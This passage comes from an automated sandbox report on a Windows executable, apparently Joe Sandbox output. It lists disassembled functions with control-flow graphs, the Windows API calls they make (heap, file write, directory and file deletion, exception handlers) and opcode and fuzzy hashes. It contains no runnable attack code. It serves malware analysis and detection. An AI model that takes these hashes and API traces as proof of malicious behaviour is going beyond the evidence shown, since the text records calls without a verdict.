                                                              control_flow_graph 126 14000593c-14000593e 127 140005945-140005954 126->127 127->127 128 140005956-140005979 call 1400123e0 127->128 131 14000597b-140005987 128->131 132 140005a39-140005a53 131->132 133 14000598d-140005a33 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 131->133 135 140005a55-140005a61 132->135 133->131 133->132 137 140005b13-140005b2d 135->137 138 140005a67-140005b0d call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 135->138 141 140005b2f-140005b3b 137->141 138->135 138->137 144 140005b41-140005be7 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 141->144 145 140005bed-140005c07 141->145 144->141 144->145 149 140005c09-140005c15 145->149 153 140005cc7-140005ce1 149->153 154 140005c1b-140005cc1 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 149->154 159 140005ce3-140005cef 153->159 154->149 154->153 160 140005da1-140005dbb 159->160 161 140005cf5-140005d91 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 159->161 168 140005dbd-140005dc9 160->168 284 140005d96-140005d9b 161->284 175 140005e7f-140005e99 168->175 176 140005dcf-140005e79 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 168->176 184 140005e9b-140005ea7 175->184 176->168 176->175 192 140005f5d-140005f77 184->192 193 140005ead-140005f57 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 184->193 201 140005f79-140005f85 192->201 193->184 193->192 209 14000603b-140006055 201->209 210 140005f8b-140006035 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 201->210 219 140006057-140006063 209->219 210->201 210->209 228 140006119-14000657b call 1400121c0 call 140012450 * 2 call 140012210 call 1400121c0 * 2 call 1400047e2 call 140012210 call 14000c2bc GetModuleHandleW call 1400121c0 * 4 call 140010ba0 call 1400125d0 call 140007dc0 call 140012210 call 1400121c0 * 4 call 140010ba0 call 1400125d0 call 140007dc0 call 140012210 call 140004134 call 1400121c0 * 2 call 140002c46 call 140006a58 call 140001e57 call 1400067aa call 1400121c0 * 2 call 14000ca70 call 1400049ea call 140012210 PathRemoveBackslashW call 140002bab call 1400121c0 * 3 call 140003cc9 call 140012520 call 1400125d0 call 14000c45c call 140006a58 call 1400121c0 call 140012450 * 2 call 140012210 call 1400121c0 * 2 call 1400026bb call 140012210 call 140004ee2 call 1400121c0 call 140012450 call 140012210 PathQuoteSpacesW call 1400121c0 call 140012450 * 3 call 140012210 PathQuoteSpacesW 219->228 229 140006069-140006113 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 219->229 428 1400065a1-1400065a6 call 140003ddc 228->428 429 14000657d-14000659f call 140007284 228->429 229->219 229->228 284->159 284->160 432 1400065ab-1400067a9 call 1400121c0 * 2 call 140012450 * 3 call 140012520 call 1400121c0 * 2 call 14000daa8 call 140012520 call 1400121c0 call 140012450 * 2 call 1400125d0 * 3 call 1400029c8 call 140006a58 call 140002930 call 140012360 * 10 428->432 429->432
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Value$HeapPath$AllocCriticalErrorLastQuoteSectionSpaces$BackslashCharCreateEnterEnvironmentFileFreeHandleLeaveModuleNameRemoveTempThreadUpperVariablewcslen
                                                              • String ID:
                                                              • API String ID: 2499486723-0
                                                              • Opcode ID: 01fd8b8b98fab0c980f96e61b2251792a09e9ddd7d05bec7d734751dcc1b6e06
                                                              • Instruction ID: 5e2f233be3bb1e1a489454234068146e28d45b36aeb09ace1181e30b51997f55
                                                              • Opcode Fuzzy Hash: 01fd8b8b98fab0c980f96e61b2251792a09e9ddd7d05bec7d734751dcc1b6e06
                                                              • Instruction Fuzzy Hash: 6C722BB6E25548D6EA16B7B7B8877E95220A3AD394F500411FF4C0B363EE39C5F64B10
                                                              Function 000000014000E620 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FilePointermemmove
                                                              • String ID:
                                                              • API String ID: 2366752189-0
                                                              • Opcode ID: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
                                                              • Instruction ID: b9f44d82ba4cb6c24f152d63ce96d8852f082d92484b54d7365d071901ec84b9
                                                              • Opcode Fuzzy Hash: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
                                                              • Instruction Fuzzy Hash: 7541837770468086DB01CF7AF1402ADF7A4EB98BD9F084426EF4C43BA5DA39C591CB50
                                                              Function 000000014000E3F0 Relevance: 4.6, APIs: 3, Instructions: 67filememoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 509 14000e3f0-14000e404 510 14000e4f3-14000e4fd 509->510 511 14000e40a-14000e40e 509->511 511->510 512 14000e414-14000e418 511->512 513 14000e483-14000e4a6 call 14000e770 512->513 514 14000e41a-14000e423 512->514 521 14000e4a8-14000e4b5 513->521 522 14000e4ee 513->522 516 14000e451-14000e45b 514->516 517 14000e425 514->517 516->516 518 14000e45d-14000e482 WriteFile 516->518 520 14000e430-14000e43a 517->520 520->520 523 14000e43c-14000e450 call 14000e620 520->523 524 14000e4c5-14000e4d6 WriteFile 521->524 525 14000e4b7-14000e4ba call 14000e620 521->525 522->510 528 14000e4dc-14000e4e8 HeapFree 524->528 530 14000e4bf-14000e4c3 525->530 528->522 530->528
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$FreeHeap
                                                              • String ID:
                                                              • API String ID: 74418370-0
                                                              • Opcode ID: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
                                                              • Instruction ID: 9d08b72cfe526555b527e3d6fc60fa1eae748afb3cf0625e1a419d858907832f
                                                              • Opcode Fuzzy Hash: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
                                                              • Instruction Fuzzy Hash: 43317EB2205A8082EB22DF16E0453A9B7B0F789BD4F548515EB59577F4DF3EC488CB00
                                                              Function 000000014000E770 Relevance: 4.6, APIs: 3, Instructions: 51memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 531 14000e770-14000e7b7 WideCharToMultiByte 532 14000e7b9-14000e7d6 HeapAlloc 531->532 533 14000e81f-14000e822 531->533 534 14000e804 532->534 535 14000e7d8-14000e801 WideCharToMultiByte 532->535 536 14000e809-14000e81e 533->536 534->536 535->534
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocHeap
                                                              • String ID:
                                                              • API String ID: 3475569825-0
                                                              • Opcode ID: 49eb562b8cb434ff95f7e7d63f5ecf434c56baadcc58e4f799a86c336de5446e
                                                              • Instruction ID: ae5164d7e213c5423ce426761272d4060c1fe25f0e8d52ef4d31f29a04fa76ea
                                                              • Opcode Fuzzy Hash: 49eb562b8cb434ff95f7e7d63f5ecf434c56baadcc58e4f799a86c336de5446e
                                                              • Instruction Fuzzy Hash: D9112B72615B8082E754DF26B84435AB7A5FBC8BD0F148228EF9D63BA4DF38C5229704
                                                              Function 000000014000D914 Relevance: 4.5, APIs: 3, Instructions: 39COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 537 14000d914-14000d922 538 14000d924-14000d95a wcsncpy wcslen 537->538 539 14000d99e 537->539 540 14000d98a-14000d99c CreateDirectoryW 538->540 541 14000d95c-14000d96b 538->541 542 14000d9a0-14000d9a8 539->542 540->542 541->540 543 14000d96d-14000d97b 541->543 543->540 544 14000d97d-14000d988 543->544 544->540 544->541
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectorywcslenwcsncpy
                                                              • String ID:
                                                              • API String ID: 961886536-0
                                                              • Opcode ID: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
                                                              • Instruction ID: 5f5e6732187473c7e9a992da28a106256b0abf82a063e4d7cd37b44a9c7c83f6
                                                              • Opcode Fuzzy Hash: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
                                                              • Instruction Fuzzy Hash: 100188A621264191EF72DB65E0643E9B350F78C7C4F804523FB8D036A8EE3DC645CB14
                                                              Function 000000014000B538 Relevance: 4.5, APIs: 3, Instructions: 13COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 545 14000b538-14000b573 memset InitCommonControlsEx CoInitialize
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CommonControlsInitInitializememset
                                                              • String ID:
                                                              • API String ID: 2179856907-0
                                                              • Opcode ID: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
                                                              • Instruction ID: 449a974473b47bcf77cc2e9d1d873e7016711834fb404a36d393ff203d460c1f
                                                              • Opcode Fuzzy Hash: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
                                                              • Instruction Fuzzy Hash: E0E0E27263658092E785EB22E8857AEB260FB88748FC06105F38B469A5CF3DC659CF00
                                                              Function 0000000140012210 Relevance: 3.8, APIs: 3, Instructions: 51memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocHeap$Value
                                                              • String ID:
                                                              • API String ID: 3898337583-0
                                                              • Opcode ID: 8fb7bdff1a5ea7f5a6416ebb7e65581105b868b3e6afb08efbefc70494558fec
                                                              • Instruction ID: 13d1d2221b5dfffbe944c94766c5cf34ad854dcf92a9a233d77868c63a58341b
                                                              • Opcode Fuzzy Hash: 8fb7bdff1a5ea7f5a6416ebb7e65581105b868b3e6afb08efbefc70494558fec
                                                              • Instruction Fuzzy Hash: BA21A336609B40C6DA21CB5AE89136AB7A1F7CDBD4F108126EB8D87B38DF3DC5518B00
                                                              Function 00000001400029C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CodeExitProcess
                                                              • String ID: open
                                                              • API String ID: 3861947596-2758837156
                                                              • Opcode ID: b7feb277e73c6429ec278226bbe6df587e3a7ad8db4220ec3f4f0566a99c26d5
                                                              • Instruction ID: e85bff13557fc8eee7e7e221a0258bb1a2e766680f88975b06e903b36e14beee
                                                              • Opcode Fuzzy Hash: b7feb277e73c6429ec278226bbe6df587e3a7ad8db4220ec3f4f0566a99c26d5
                                                              • Instruction Fuzzy Hash: 44315E73A19A84D9DA619B6AF8417EE6364F388784F404415FF8D07B6ADF3CC2958B40
                                                              Function 0000000140001000 Relevance: 3.1, APIs: 2, Instructions: 112memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0000000140012060: HeapCreate.KERNEL32 ref: 000000014001206E
                                                                • Part of subcall function 0000000140012060: TlsAlloc.KERNEL32 ref: 000000014001207B
                                                                • Part of subcall function 000000014000C980: HeapCreate.KERNEL32 ref: 000000014000C98E
                                                                • Part of subcall function 000000014000B538: memset.MSVCRT ref: 000000014000B547
                                                                • Part of subcall function 000000014000B538: InitCommonControlsEx.COMCTL32 ref: 000000014000B561
                                                                • Part of subcall function 000000014000B538: CoInitialize.OLE32 ref: 000000014000B569
                                                                • Part of subcall function 00000001400120D0: HeapAlloc.KERNEL32 ref: 0000000140012123
                                                                • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD11
                                                                • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD42
                                                                • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CDB2
                                                                • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D56E
                                                                • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D58F
                                                                • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D5A1
                                                                • Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D476
                                                                • Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D491
                                                                • Part of subcall function 0000000140011D30: HeapAlloc.KERNEL32 ref: 0000000140011D82
                                                                • Part of subcall function 0000000140011D30: memset.MSVCRT ref: 0000000140011DB6
                                                                • Part of subcall function 00000001400120D0: HeapReAlloc.KERNEL32 ref: 0000000140012151
                                                                • Part of subcall function 00000001400120D0: HeapFree.KERNEL32 ref: 0000000140012194
                                                                • Part of subcall function 000000014000C4D0: RemoveVectoredExceptionHandler.KERNEL32 ref: 000000014000C8A5
                                                                • Part of subcall function 000000014000C4D0: AddVectoredExceptionHandler.KERNEL32 ref: 000000014000C8C0
                                                                • Part of subcall function 00000001400121C0: GetLastError.KERNEL32 ref: 00000001400121C4
                                                                • Part of subcall function 00000001400121C0: TlsGetValue.KERNEL32 ref: 00000001400121D4
                                                                • Part of subcall function 00000001400121C0: SetLastError.KERNEL32 ref: 00000001400121F1
                                                                • Part of subcall function 0000000140012210: TlsGetValue.KERNEL32 ref: 0000000140012223
                                                                • Part of subcall function 0000000140012210: HeapAlloc.KERNEL32 ref: 0000000140012266
                                                              • HeapDestroy.KERNEL32 ref: 000000014000124C
                                                              • ExitProcess.KERNEL32 ref: 0000000140001258
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Heap$Alloc$Free$CreateErrorExceptionHandlerLastValueVectoredmemset$CommonControlsDestroyExitInitInitializeProcessRemove
                                                              • String ID:
                                                              • API String ID: 1207063833-0
                                                              • Opcode ID: 06dbeff3fd86c6695b84df31992dbf02651ab7d441abcdbe23a8bedf592c97f1
                                                              • Instruction ID: 5ef5c56730dbad915fac233b77092dd37bc53bc4ec3343fa221c1b372e2f6746
                                                              • Opcode Fuzzy Hash: 06dbeff3fd86c6695b84df31992dbf02651ab7d441abcdbe23a8bedf592c97f1
                                                              • Instruction Fuzzy Hash: 9D510AF0A11A4081FA03F7A3F8527E926559B9D7D0F808119BF1D1B3F3DD3A86598B22
                                                              Function 0000000140002930 Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00000001400123E0: TlsGetValue.KERNEL32 ref: 00000001400123F8
                                                              • RemoveDirectoryW.KERNEL32(00000000,?,0000000140003010), ref: 000000014000299C
                                                              • RemoveDirectoryW.KERNEL32(?,0000000140003010), ref: 00000001400029A8
                                                                • Part of subcall function 0000000140007170: WaitForSingleObject.KERNEL32 ref: 0000000140007187
                                                                • Part of subcall function 000000014000720C: TerminateThread.KERNEL32 ref: 0000000140007223
                                                                • Part of subcall function 000000014000720C: EnterCriticalSection.KERNEL32 ref: 0000000140007230
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: DirectoryRemove$CriticalEnterObjectSectionSingleTerminateThreadValueWait
                                                              • String ID:
                                                              • API String ID: 547990026-0
                                                              • Opcode ID: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
                                                              • Instruction ID: 7a41e47de86a43ff34abb2becfbad555fd020f9bfb046cc2ed969e3c0c855493
                                                              • Opcode Fuzzy Hash: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
                                                              • Instruction Fuzzy Hash: 0F01FFF5509B01E5F923BB63BC02BDA6B61E74E3E0F409405BB89131B3DE3DD9849610
                                                              Function 000000014000C4D0 Relevance: 3.0, APIs: 2, Instructions: 20COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ExceptionHandlerVectored$Remove
                                                              • String ID:
                                                              • API String ID: 3670940754-0
                                                              • Opcode ID: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
                                                              • Instruction ID: 54ed52b0d94e107c171475cce83a86a7777a808cb3853d4771323e3d57a36066
                                                              • Opcode Fuzzy Hash: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
                                                              • Instruction Fuzzy Hash: 8AF0ED7061370485FE5BDB93B8987F472A0AB4C7C0F184029BB49076719F3C88A48348
                                                              Function 000000014000DA6C Relevance: 3.0, APIs: 2, Instructions: 19fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 674 14000da6c-14000da80 676 14000da82-14000da85 674->676 677 14000da9f 674->677 679 14000da92-14000da9d DeleteFileW 676->679 680 14000da87-14000da8c SetFileAttributesW 676->680 678 14000daa1-14000daa6 677->678 679->678 680->679
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesDelete
                                                              • String ID:
                                                              • API String ID: 2910425767-0
                                                              • Opcode ID: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
                                                              • Instruction ID: adf2a79140fabccb03c20fd21f07aa3af446659453137af282c5310bbe8ffc9f
                                                              • Opcode Fuzzy Hash: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
                                                              • Instruction Fuzzy Hash: 48E05BB471910195FB6BD7A778153F521419F8D7D1F184121AB42071B0EF3D44C55222
                                                              Function 0000000140012060 Relevance: 3.0, APIs: 2, Instructions: 11memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocHeap$CreateValue
                                                              • String ID:
                                                              • API String ID: 493873155-0
                                                              • Opcode ID: 9e0d5e764e4f7f0553988baf76ecb42ee58d508d85325be61ca51fd0dfb33207
                                                              • Instruction ID: 66307e28580f649ba8418ae6b9c958ace7f1b69875393c61862d084d03b91818
                                                              • Opcode Fuzzy Hash: 9e0d5e764e4f7f0553988baf76ecb42ee58d508d85325be61ca51fd0dfb33207
                                                              • Instruction Fuzzy Hash: 9ED0C939A1175092EB46AB72AC5A3E922A0F75C3C1F901819B70907775DF7E81956A00
                                                              Function 00000001400120A0 Relevance: 3.0, APIs: 2, Instructions: 7memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: DestroyFreeHeap
                                                              • String ID:
                                                              • API String ID: 3293292866-0
                                                              • Opcode ID: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
                                                              • Instruction ID: 71a10d3d5b3131d437c50284ad1bfb95f0c128dd24e11de8e9b8b88d768efc2d
                                                              • Opcode Fuzzy Hash: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
                                                              • Instruction Fuzzy Hash: 4CC04C34611400D2E606EB13EC953A42362B79C7C5F801414E70E1B671CE394955E700
                                                              Function 0000000140011D30 Relevance: 2.6, APIs: 2, Instructions: 67memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocFreememset
                                                              • String ID:
                                                              • API String ID: 3063399779-0
